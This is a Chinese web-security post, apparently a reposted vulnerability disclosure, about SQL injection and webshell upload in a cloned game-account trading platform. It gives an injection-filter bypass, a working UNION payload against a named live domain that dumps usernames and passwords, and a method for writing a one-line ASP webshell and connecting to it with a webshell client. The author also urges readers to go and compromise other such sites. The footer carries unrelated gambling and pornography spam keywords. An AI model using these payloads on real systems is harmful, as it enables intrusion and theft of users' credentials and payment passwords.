通用型仿5173游戲交易平臺系統SQL注入(可直接脫褲)+Getshell_安全漏洞聚焦_龍虎鷹師網安服務器維護基地--Powered by www.vqbhynr.com.cn

通用型仿5173游戲交易平臺系統SQL注入(可直接脫褲)+Getshell

作者:龍虎鷹師網安 來源: 瀏覽次數:0

本篇關鍵詞:通用型交易平臺系統
龍虎鷹師網安網訊: 最近沒事登登好幾年前玩過的游戲看看,發現有人喊高價收號,這一看就是騙子,這等騙子還想騙我?我就來看看這逗逼是怎么騙人的,結果發現這人給了一個說是5173平臺交易的網站,叫我直接把號的信息填上去然后填好了
 最近沒事登登好幾年前玩過的游戲看看發現有人喊高價收號這一看就是騙子,這等騙子還想騙我?我就來看看這逗逼是怎么騙人的,結果發現這人給了一個說是5173平臺交易的網站,叫我直接把號的信息填上去然后填好了之后就去他就會去購買,然后仔細看了一下平臺,獲取了源代碼后看了一下~呵呵,漏洞還是有不少的~ 仿5173網游交易平臺游戲交易平臺存在注入與getshell漏洞,可直接拖掉玩家數據~
發烏云上烏云不收,所以沒事就發zone里給大家玩玩其實這系統還是蠻多漏洞的,我最痛恨騙子了,大家能搞幾個騙子平臺就搞幾個去吧~案例上大多都是一些騙子搭建來釣魚的

\
A:SQL注入一:
漏洞文件:/help.asp
\
這里id參數過濾不嚴存在sql注入的,但是conn.asp中包含了:

\
都知道這個防注入文件很垃圾吧,只做了GET和POST的防注入,可直接轉為cookie注入繞過
\

這個注入我就不多研究了,看下一個支持UNION query的注入點。

B:SQL注入二
漏洞文件:/card_server.asp

\

這里沒有直接包含數據庫連接文件,直接創建了連接對象,導致這一個注入是無法被sqlin.asp防御,注意,Request的sel參數沒有過濾直接帶入查詢導致了SQL注入。簡單構造一下注入點:

http://127.0.0.1/card_server.asp?sel=1′

Microsoft JET Database Engine 錯誤 ‘80040e14’
字符串的語法錯誤 在查詢表達式 ‘parentid=1” 中。
/card_server.asp,行 28

\

\

支持聯合查詢,可直脫掉ganme_user的玩家數據,好像sqlmap沒有game_user的字典吧?。還有一個字段”alipay_pwd”是用戶的支付密碼~

\

\

由于通用型的要5個案例,那我就來五個~
\

我來脫個褲子給大家看看:

http://www.tylsf.com.cn/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user

\

C:GETSHELL:
漏洞文件:/SqlIn.Asp
\




這里直接將用戶非法提交的字符串寫入了sql_whelpu.asp的數據庫里面了,試想一下,如果故意加入一句話不就可以GETSHELL了嗎? 在沒有被人插入過asp的<%%>符號則可直接訪問:

\
當然如果有被人提交過的需要注意閉合就可以獲取webshell了~ 這里成功將一句話寫入數據庫:sql_whelpu.asp,我們打開看看是不是呢?

\

菜刀連接:
http://127.0.0.1/sql_whelpu.asp

\

大家吃好喝好玩好!大家隨便玩,別打臉就是啊!



    龍虎鷹師網安服務器維護方案本篇連接:http://www.vqbhynr.com.cn/show-19749-1.html
網站維護教程更新時間:2016-05-21 17:44:47  【打印此頁】  【關閉
全站連接N點 | 龍虎鷹師網安 |  
專業服務器維護及網站維護手工安全搭建環境,網站安全加固服務。龍虎鷹師網安服務器維護基地招商進行中!請QQ:29769479

footer  footer  互聯網安全  footer    

山东体十一选五走势 苍井空在线A级观看网站 冲田梨杏 ed2k无码番号 长春站街女爽记 体球网旧版比分 古田美穗东京热 太原按摩 体验 山东11选5最大遗 银川沐足服务比较好 萬赢在线配资 中原风采22选开奖今天 sm捆绑丝袜 重庆百变王牌 新十一选五APP-安卓下载 nba活塞vs湖人maidi 可以赢现金的麻将游戏 大逃杀